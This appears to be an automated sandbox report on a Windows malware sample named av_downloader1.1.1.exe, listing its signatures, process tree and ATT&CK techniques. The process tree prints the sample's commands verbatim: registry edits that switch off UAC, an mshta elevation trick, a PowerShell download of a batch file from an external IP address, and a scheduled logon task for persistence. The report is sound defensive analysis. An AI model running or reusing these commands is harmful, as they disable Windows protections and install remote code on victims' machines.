Analysis
-
max time kernel
147s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 11:27
Static task
static1
Behavioral task
behavioral1
Sample
av_downloader1.1.1.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
av_downloader1.1.1.exe
Resource
win10v2004-20240802-en
General
-
Target
av_downloader1.1.1.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 30 4660 powershell.exe -
pid Process 4660 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4780 attrib.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation av_downloader1.1.1.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation AV_DOW~1.EXE -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2792 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AV_DOW~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader1.1.1.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2708 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4660 powershell.exe 4660 powershell.exe 1668 msedge.exe 1668 msedge.exe 5036 msedge.exe 5036 msedge.exe 3544 identity_helper.exe 3544 identity_helper.exe 2268 msedge.exe 2268 msedge.exe 2268 msedge.exe 2268 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4660 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe 5036 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3568 wrote to memory of 2128 3568 av_downloader1.1.1.exe 82 PID 3568 wrote to memory of 2128 3568 av_downloader1.1.1.exe 82 PID 2128 wrote to memory of 2792 2128 cmd.exe 85 PID 2128 wrote to memory of 2792 2128 cmd.exe 85 PID 2792 wrote to memory of 1536 2792 mshta.exe 86 PID 2792 wrote to memory of 1536 2792 mshta.exe 86 PID 2792 wrote to memory of 1536 2792 mshta.exe 86 PID 1536 wrote to memory of 3984 1536 AV_DOW~1.EXE 87 PID 1536 wrote to memory of 3984 1536 AV_DOW~1.EXE 87 PID 3984 wrote to memory of 2396 3984 cmd.exe 89 PID 3984 wrote to memory of 2396 3984 cmd.exe 89 PID 3984 wrote to memory of 32 3984 cmd.exe 90 PID 3984 wrote to memory of 32 3984 cmd.exe 90 PID 3984 wrote to memory of 932 3984 cmd.exe 91 PID 3984 wrote to memory of 932 3984 cmd.exe 91 PID 3984 wrote to memory of 4884 3984 cmd.exe 92 PID 3984 wrote to memory of 4884 3984 cmd.exe 92 PID 4884 wrote to memory of 2028 4884 cmd.exe 93 PID 4884 wrote to memory of 2028 4884 cmd.exe 93 PID 3984 wrote to memory of 5036 3984 cmd.exe 94 PID 3984 wrote to memory of 5036 3984 cmd.exe 94 PID 5036 wrote to memory of 3032 5036 msedge.exe 95 PID 5036 wrote to memory of 3032 5036 msedge.exe 95 PID 3984 wrote to memory of 4780 3984 cmd.exe 96 PID 3984 wrote to memory of 4780 3984 cmd.exe 96 PID 3984 wrote to memory of 4660 3984 cmd.exe 97 PID 3984 wrote to memory of 4660 3984 cmd.exe 97 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 PID 5036 wrote to memory of 4972 5036 msedge.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4780 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.1.exe"C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9318.tmp\9319.tmp\931A.bat C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9645.tmp\9646.tmp\9647.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"5⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2396
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:32
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵PID:2028
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbd40246f8,0x7ffbd4024708,0x7ffbd40247187⤵PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:27⤵PID:4972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:1668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:87⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:17⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:17⤵PID:1640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:17⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:87⤵PID:3120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:17⤵PID:3676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:17⤵PID:2652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:17⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:17⤵PID:1536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1480298535449983597,9972556189020879588,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3116 /prefetch:27⤵
- Suspicious behavior: EnumeratesProcesses
PID:2268
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2708
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4472
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1476
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD54dd2754d1bea40445984d65abee82b21
SHA14b6a5658bae9a784a370a115fbb4a12e92bd3390
SHA256183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d
SHA51292d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1
-
Filesize
152B
MD5ecf7ca53c80b5245e35839009d12f866
SHA1a7af77cf31d410708ebd35a232a80bddfb0615bb
SHA256882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687
SHA512706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize816B
MD56fec02241b3968cede23b318c631de68
SHA14e70be4d28b01c2c80bde982d1164fad697cd04f
SHA256955524f3a78ee9e7d6f208e42cf634160652de9d67873e3a54f67426aa3659a8
SHA51211e008120afc112b508fc3274d4a573403dc057c4187c7553dc384c87401d6af1c7b4c8c84065bfa617c771ccf39468a446c3ddc6a836eb6797254e6fdcaaf5a
-
Filesize
1KB
MD5acfe22fe15724d820373d1a7b3dbf244
SHA14f9cd900403c17cd7cb0dc7e5e1b12d36188564b
SHA2565eafa60dc092df4e648eb45660dfbb5bfd998f2c4960b0a41a5a2678627fe2bb
SHA512bca40e56125d08bfcb5d90f5615afe36f6f5e8bc0ec2335189aaf11bb894aa486dc56a0e0f36aef300474e6a497ed1a68870b19fb37c1bf67358fe6491fe565d
-
Filesize
5KB
MD573fb1441d4752516e3c7ebc600e62ea6
SHA1765173f5878dee6a48918f8218f91a8f7a27dca9
SHA256c68791b93ba73dc43e5c2afe80d5146f4ee664b0a8d0d4d14939717163809ab8
SHA5126f8b2d10690dbe0ebc2c3b24973ce832a54bd1abd46e3d0a85b976207c6e0637b50b513715b1af30184bd8a7f87ac55f4b9cc89476849ea5e83588456cc75915
-
Filesize
6KB
MD50d2cbf2fbf19530230241d4f98ab9087
SHA13ec0a89c04a6b92a25521ddd8396c30eeef30292
SHA2563f3f920055b60e355bb3f061ec67330ce268eeb28a6a542d257bf8ed572b6ce4
SHA5127a5196d0a3b66db4d2ea4d9099d4cf0cfa6430aa84afa368387a825f492e5b20b8d87e983f3f65d38d677cc3bac419a4c7a9ca832a9e4b5111a49efe5510f334
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize96B
MD57ecf59cf19d1adf8e444635070d5a2f9
SHA1951d59b38912b9c46ed535d71f22cc308412186f
SHA256b959f3b8325ba219cfd1daf202119cacfe444eb88b9913a9a426fdb0e12c8c4c
SHA512e161d9fe922b0d0171b93e1a371d5d4ad8c2ee97664c3252a30c7d20818b04627a30e5c5dc83d9c1cfd6a58c357a57147e616ad68c8f8163d5761b9b0d76a475
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f31a.TMP
Filesize48B
MD56dd7a3d5725afd90825fbd545f394fc3
SHA1c40239d2779a4e9c452556118cb4d5b6b94ef4c8
SHA256e19f4b3a5bc4046aef5773dc638eb56bbca3fe7fe58e2741c819c08e800498c7
SHA5126be1d9017902795d070f930fb04d52a4a7e7b083569ded17d5d6607fdbdf08ac26cc60d7d3e5196d895bd1baf961c49a3033d81be82b084812b166659d1c7c28
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD520532f36d7e3a994ba761b1566a9db13
SHA1caf9857b2afc19f19df4c3696d3ed35a0fa53498
SHA256eff29c6330bcda5ee4fb8c5c6d22894590b206ce1de55731b667178ed289ac13
SHA5125e080bfc526a1cf6fd02f2e82d284aab5ab97bb4738d80cbd6ebc2a7d8703acadb7575d50f41973044b9aa0611a6fefac81a6ac001c1ecacc687fac9d91855fd
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82